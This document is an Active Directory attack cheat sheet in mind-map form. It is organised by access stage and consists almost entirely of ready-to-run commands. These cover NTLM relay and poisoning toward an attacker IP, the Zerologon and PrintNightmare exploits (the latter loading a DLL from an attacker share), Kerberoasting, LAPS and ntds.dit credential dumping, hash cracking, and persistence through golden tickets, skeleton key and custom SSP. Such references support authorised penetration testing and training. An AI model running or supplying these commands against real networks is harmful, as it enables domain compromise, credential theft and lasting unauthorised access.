Penetration Manual
Original map by mayfly (@M4yFly); hosted by Mahyar TajDini (Mahyar@TajDini.net, Linkedin.com/in/mahyartajdini, TajDini.net)

No credentials
  Find user list
    enum4linux -U <dc-ip> | grep 'user:'
    crackmapexec smb <ip> -u <user> -p '<password>' --users
    nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
    OSINT - enumerate username on internet
    rpcclient $> lookupnames <name>
    wmic useraccount get name,sid
  Enumerate ldap
    ldapsearch -x -h <ip> -s base
    389 <dc-ip>
  Enum dns record
    dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>
  Unsigned SMB (find smb not signed)
    nmap -Pn -sS -T4 --open --script smb-security-mode -p445 ADDRESS/MASK
    cme smb $hosts --gen-relay-list relay.txt
    use exploit/windows/smb/smb_relay
    responder -I eth0 # disable smb & http
    ntlmrelayx.py -tf targets.txt
  Relay/poisoning
    responder -i eth0
    mitm6 -d <domain>
    ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
  MS08-068
    use exploit/windows/smb/smb_relay # windows2000 / windows server2008
  Zerologon
    python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
    secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator"
    secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>
    python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>

User found (got one account on the domain)
  Enumeration: powerview / pywerview
  Get kerberoastable users (kerberoasting)
    GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
    Rubeus kerberoast
    Get-DomainUser -SPN -Properties SamAccountName,ServicePrincipalName
    MATCH (u:User {hasspn:true}) RETURN u
    MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
  Relay (no smb signing || ipv6 enabled || adcs)
    mitm6 -i eth0 -d <domain>
    ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
  Resource-Based Constrained Delegation
    ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
    getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
  Printers spooler service abuse
    rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
    printerbug.py '<domain>/<username>:<password>'@<Printer IP> <RESPONDERIP>
  ADCS
    PetitPotam.py -d <domain> <listener_ip> <target_ip>
    ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
    Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
  MS14-068
    FindSMB2UPTime.py <ip>
    auxiliary/admin/kerberos/ms14_068_kerberos_checksum
    goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
    kerberos::ptc "<ticket>"
  PrintNightmare
    CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'
  MSSQL Trusted Links
    use exploit/windows/mssql/mssql_linkcrawler
  WSUSpect
    WSUSpendu.ps1 # need compromised WSUS server
  sccm
    CMPivot
  DNS server plugin (need a dnsadmin user)
    dnscmd.exe /config /serverlevelplugindll <\\path\to\dll>
    sc \\DNSServer stop dns
    sc \\DNSServer start dns
  AD acl abuse (aclpwn.py)
    GenericAll on User
    GenericAll on Group
    GenericAll / GenericWrite / Write on Computer
    WriteProperty on Group
    Self (Self-Membership) on Group
    WriteProperty (Self-Membership)
    ForceChangePassword
    WriteOwner on Group
    GenericWrite on User
    WriteDACL + WriteOwner
    GPO Delegation
  Get laps passwords
    Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
    foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}

User & hash found
  Lateral move
  Crack hash
    LM
      john --format=lm hash.txt
      hashcat -m 3000 -a 3 hash.txt
    NTLM
      john --format=nt hash.txt
      hashcat -m 1000 -a 3 hash.txt
    NTLMv1
      john --format=netntlm hash.txt
      hashcat -m 5500 -a 3 hash.txt
    NTLMv2
      john --format=netntlmv2 hash.txt
      hashcat -m 5600 -a 0 hash.txt rockyou.txt
    Kerberos 5 TGS
      john spn.txt --format=krb5tgs --wordlist=rockyou.txt
      hashcat -m 13100 -a 0 spn.txt rockyou.txt
    Kerberos ASREP
      hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt

Domain admin
  dcsync
    lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
  Dump ntds.dit
    crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> --ntds
    secretsdump.py '<domain>/<user>:<pass>'@<ip>
    ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
    secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
  Persistence
    Golden ticket
      ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
    Silver Ticket
      .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
    DSRM
      PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
    Skeleton Key
      mimikatz "privilege::debug" "misc::skeleton" "exit"
    Custom SSP
      mimikatz "privilege::debug" "misc::memssp" "exit"
      C:\Windows\System32\kiwissp.log
  Trust relationship
    Child Domain to Forest Compromise - SID Hijacking
      Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData| select objectsid
      kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
    Forest to Forest Compromise - Trust Ticket
      mimikatz lsadump::trust
      "lsadump::trust /patch"
      "lsadump::lsa /patch"
      "kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:<golden_ticket_path>"
    Breaking forest trust
      printerbug or petitpotam to force the DC of the external forest to connect on a local unconstrained delegation machine. Capture TGT, inject into memory and dcsync
...